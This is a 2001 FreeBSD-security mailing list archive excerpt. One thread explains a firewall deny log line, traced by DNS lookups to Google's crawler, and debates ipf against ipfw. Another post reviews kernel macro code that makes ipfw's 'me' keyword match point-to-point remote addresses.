10:04 AM > > > > > > On Fri, Jun 29, 2001 at 09:49:54AM -0500, > George.Giles@mcmail.vanderbilt.edu wrote: > > What is ipfw telling me ? > > > > The 216 host is attempting to break in, but how is it using port 80 on > the > > other machine ? > > > > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 > > The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection > attempt is from port 21602 (ephemeral, unique to this connection in > a certain timeframe) to port 80 on 10.0.0.1. That is, someone from > 216.239.46.20 is trying to browse the web on 10.0.0.1. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 12:55:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 5B12437B406 for ; Fri, 29 Jun 2001 12:55:25 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 45163 invoked by uid 1001); 29 Jun 2001 19:58:31 -0000 Message-ID: <20010629195831.45162.qmail@d170h113.resnet.uconn.edu> References: In-Reply-To: From: "Peter C. Lai" To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Date: Fri, 29 Jun 2001 19:58:31 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Machines from the 216.239.46. subnet has been trying to attack my machine as well, and this is not an isolated incident. Furthermore, i also know that i am not on the vanderbilt.edu network. Would looking at mynetwatchman's database help me figure out any other trends in attacks coming from 216.239.46? Currently i'm not running any firewall (since i am not running any unsafe ports); only log_in_vain is enabled, but I almost want to configure ipf/w just so i can block this whole subnet. George.Giles@mcmail.vanderbilt.edu writes: > What is ipfw telling me ? > > The 216 host is attempting to break in, but how is it using port 80 on the > other machine ? > > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ----------- Peter C. Lai University of Connecticut Dept. of Residential Life | Programmer Dept. of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 14:15:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id 0573B37B403 for ; Fri, 29 Jun 2001 14:15:18 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 5F5FF2FAE; Fri, 29 Jun 2001 14:15:04 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id OAA06336; Fri, 29 Jun 2001 14:15:04 -0700 From: appleseed@hushmail.com Message-Id: <200106292115.OAA06336@user7.hushmail.com> Date: Fri, 29 Jun 2001 14:05:12 -0500 (PDT) Cc: Cc:@hushmail.com, freebsd-security@FreeBSD.ORG To: To:@hushmail.com, George.Giles@mcmail.vanderbilt.edu Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF Content-type: text/plain Sup, # First I check to see who controls the subnet attacking u define.northern_ % host -t ns 46.239.216.in-addr.arpa 46.239.216.in-addr.arpa name server NS2.GOOGLE.COM 46.239.216.in-addr.arpa name server NS3.GOOGLE.COM 46.239.216.in-addr.arpa name server NS4.GOOGLE.COM 46.239.216.in-addr.arpa name server NS1.GOOGLE.COM # looks like our friend Google.com controls the NS at least. # lets check to see if these are really google's hosts by picking # random nodes define.northern_ % host -t any 216.239.46.1 1.46.239.216.IN-ADDR.ARPA domain name pointer crawl1.googlebot.com define.northern_ % host -t any 216.239.46.90 90.46.239.216.IN-ADDR.ARPA domain name pointer crawl4.googlebot.com define.northern_ % host -t any 216.239.46.127 127.46.239.216.IN-ADDR.ARPA domain name pointer crawl5.googlebot.com define.northern_ % host -t any 216.239.46.200 200.46.239.216.IN-ADDR.ARPA domain name pointer crawl8.googlebot.com define.northern_ % host -t any 216.239.46.254 254.46.239.216.IN-ADDR.ARPA domain name pointer sjbi1-gige-6-1.google.com define.northern_ % According to our findings (and PTR->A lookup confirms) this subnet consists mainly of Google's botnet, which, scours the net searching for new sites to index. ;-) I am going to assume here that someone is not spoofing google just to target your host on port 80. More than likely its just good `ol Google trying to see if you have anything interesting to index on your website (if u have one). If you want to close off access to that subnet creating incoming tcp/udp sessions I suggest u upgrade to ipf (;-)) and define keep state rules as well as deny incoming session initialization attempts. This way u can still access google's nifty database but they cant access u =) much love.. northern_ Free, encrypted, secure Web-based email at www.hushmail.com --Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 14:49:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id BBD4837B40C for ; Fri, 29 Jun 2001 14:49:22 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1888 invoked by uid 1000); 29 Jun 2001 21:53:46 -0000 Date: Sat, 30 Jun 2001 00:53:46 +0300 From: Peter Pentchev To: appleseed@hushmail.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: What is ipfw telling me ? Message-ID: <20010630005346.A887@ringworld.oblivion.bg> Mail-Followup-To: appleseed@hushmail.com, freebsd-security@FreeBSD.ORG References: <200106292115.OAA06336@user7.hushmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106292115.OAA06336@user7.hushmail.com>; from appleseed@hushmail.com on Fri, Jun 29, 2001 at 02:05:12PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 02:05:12PM -0500, appleseed@hushmail.com wrote: [snip] > If you want to > close off access to that subnet creating incoming tcp/udp sessions I suggest > u > upgrade to ipf (;-)) and define keep state rules as well as deny incoming > session > initialization attempts. This way u can still access google's nifty database > but they > cant access u =) Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4) and ipfw(8) :) G'luck, Peter -- This sentence every third, but it still comprehensible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 15:59:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id 049CF37B403 for ; Fri, 29 Jun 2001 15:59:30 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 5BB2C2EEB; Fri, 29 Jun 2001 15:59:16 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id PAA15697; Fri, 29 Jun 2001 15:59:16 -0700 From: appleseed@hushmail.com Message-Id: <200106292259.PAA15697@user7.hushmail.com> Date: Fri, 29 Jun 2001 16:00:09 -0500 (PDT) Cc: freebsd-security@FreeBSD.ORG To: Peter Pentchev Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz Content-type: text/plain >Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4) >and ipfw(8) :) Uhm. So what? Ipf > ipfw ;-) northern_ Free, encrypted, secure Web-based email at www.hushmail.com --Hushpart_boundary_kSQySHNLWVimpuLnKRBSbRpclaBGsfMz-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 16:25:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id CE7B937B401 for ; Fri, 29 Jun 2001 16:25:10 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 3941 invoked by uid 1000); 29 Jun 2001 23:29:36 -0000 Date: Sat, 30 Jun 2001 02:29:36 +0300 From: Peter Pentchev To: appleseed@hushmail.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: What is ipfw telling me ? Message-ID: <20010630022936.E887@ringworld.oblivion.bg> Mail-Followup-To: appleseed@hushmail.com, freebsd-security@FreeBSD.ORG References: <200106292259.PAA15697@user7.hushmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106292259.PAA15697@user7.hushmail.com>; from appleseed@hushmail.com on Fri, Jun 29, 2001 at 04:00:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 04:00:09PM -0500, appleseed@hushmail.com wrote: > >Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4) > >and ipfw(8) :) > Uhm. So what? Ipf > ipfw ;-) In some respects, probably. Your statement, though, seemed to imply that ipfw was not able of keeping track of state, and ipf was. That's what I tried to correct. G'luck, Peter -- If there were no counterfactuals, this sentence would not have been paradoxical. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 16:29:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id B797D37B403 for ; Fri, 29 Jun 2001 16:29:31 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 109DD2F97; Fri, 29 Jun 2001 16:29:18 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id QAA18193; Fri, 29 Jun 2001 16:29:18 -0700 From: appleseed@hushmail.com Message-Id: <200106292329.QAA18193@user7.hushmail.com> Date: Fri, 29 Jun 2001 16:29:52 -0500 (PDT) Cc: freebsd-security@FreeBSD.ORG To: Peter Pentchev Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_saCIrLnOYCavFxdulvzcMGcmEXkwVrkM" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_saCIrLnOYCavFxdulvzcMGcmEXkwVrkM Content-type: text/plain >In some respects, probably. Your statement, though, seemed to imply >that ipfw was not able of keeping track of state, and ipf was. >That's what I tried to correct. Nah, I knew what u meant. I was just messing with u ;-). Ipf is just my personal preference. northern_ Free, encrypted, secure Web-based email at www.hushmail.com --Hushpart_boundary_saCIrLnOYCavFxdulvzcMGcmEXkwVrkM-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 30 4: 1:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id 184FE37B406 for ; Sat, 30 Jun 2001 04:01:23 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id D7ED12D for ; Sat, 30 Jun 2001 19:01:21 +0800 (KRAST) Date: Sat, 30 Jun 2001 19:01:39 +0800 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Reply-To: Igor Podlesny Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <1595443006.20010630190139@morning.ru> To: freebsd-security@FreeBSD.ORG Subject: Flight of the rat, living wreck..... X-Sender: Igor Podlesny MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello everybody! This is relative to 4.3 for yet ;) so if you're using something older you can skip it easily. How it was started ------------------ For a long time I've been looking forward (and even trying to learn freebsd internals enough to implement it by myself :) for newly implemented ipfw's feature allowing easy filtering of non-transit ip-packets, i.e., packets with destination address of one of the interfaces. (You know in Linux it is done now with netfilter, which separates ip flow into 3 different chains, BSDi's ipfw looks like a programming language :) which allows such things for ages, if I'm not mistaken ;). In short -- the feature is cool, and I get prepared to start using it. At first it seemed to be okay, I felt security comparable to "deny ip from any to any" ;)), but than, noticed that something was going wrong. And this was with Point-to-point interfaces. Everything was as if remote peer ip-address matched 'me'. It's certainly wrong as far as I can guess, so after applying fixes to my IPFW's rules allowing easy going (passing) for packets to such addresses I started digging the code. ip_fw.c looks okay, but in_var.h with its INADDR_TO_IFP definition which is a core for 'me'-feature > if (f->fw_flg & IP_FW_F_SME) { > INADDR_TO_IFP(src_ip, tif); > if (tif == NULL) > continue; > } > if (f->fw_flg & IP_FW_F_DME) { > INADDR_TO_IFP(dst_ip, tif); > if (tif == NULL) > continue; doesn't: > /* > * Macro for finding the interface (ifnet structure) corresponding to one > * of our IP addresses. > */ > #define INADDR_TO_IFP(addr, ifp) \ > /* struct in_addr addr; */ \ > /* struct ifnet *ifp; */ \ > { \ > register struct in_ifaddr *ia; \ > \ > for (ia = in_ifaddrhead.tqh_first; \ // so here we start looking through the queue > ia != NULL // sanity (I'd have written just (ia)) > && ((ia->ia_ifp->if_flags & IFF_POINTOPOINT)? \ // hm. special case if the interface is PTP > IA_DSTSIN(ia):IA_SIN(ia))->sin_addr.s_addr != (addr).s_addr; \ // so it is like: if it is PTP, then we using DST address in comparison // with addr.s_addr // it is the time I started to ask myself why it is so? why we're (ok, // they're) checking for remote ip-address if the head comment // says: // * Macro for finding the interface (ifnet structure) corresponding to one // * of our IP addresses. // ^^^ // ^^^ > ia = ia->ia_link.tqe_next) \ > continue; \ // as it's seen, the algo is: checking addresses of our ifaces or // our remote ends in case of PTP until we get the matching or reach the end // this is like vice versa: looking through the queue for exact matching // and in case only ia is NULL after the first search. Also, this // it's taking into consideration only PTP interfaces and only local // addresses of them. > if (ia == NULL) \ > for (ia = in_ifaddrhead.tqh_first; \ > ia != NULL; \ > ia = ia->ia_link.tqe_next) \ > if (ia->ia_ifp->if_flags & IFF_POINTOPOINT && \ > IA_SIN(ia)->sin_addr.s_addr == (addr).s_addr) \ > break; \ // the terminator: if we have found something we would come up with // ia_ifp, or with NULL at least. > (ifp) = (ia == NULL) ? NULL : ia->ia_ifp; \ > } Now, getting down to IPFW's 'me'-keyword business: IMHO, it breaks the sense in this way: on first cycle-pass, the matching is found and ia isn't NULL. so the second is skipped. and we got the matching, although we shouldn't. I deem this is wrong. Now, in conclusion ------------------ I'm a man who hasn't very deep knowledge of the BSD's bones, still be learning it. So I can't say that the code INADDR_TO_IFP is completely wrong because of lack of knowledge and all I say is just it doesn't fit the purpose of IPFW's 'me'-keyword and the solution is to avoid using it there. Your ideas and opinions are really appreciated. Good luck everybody and thank you in advance. -- Best regards, Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message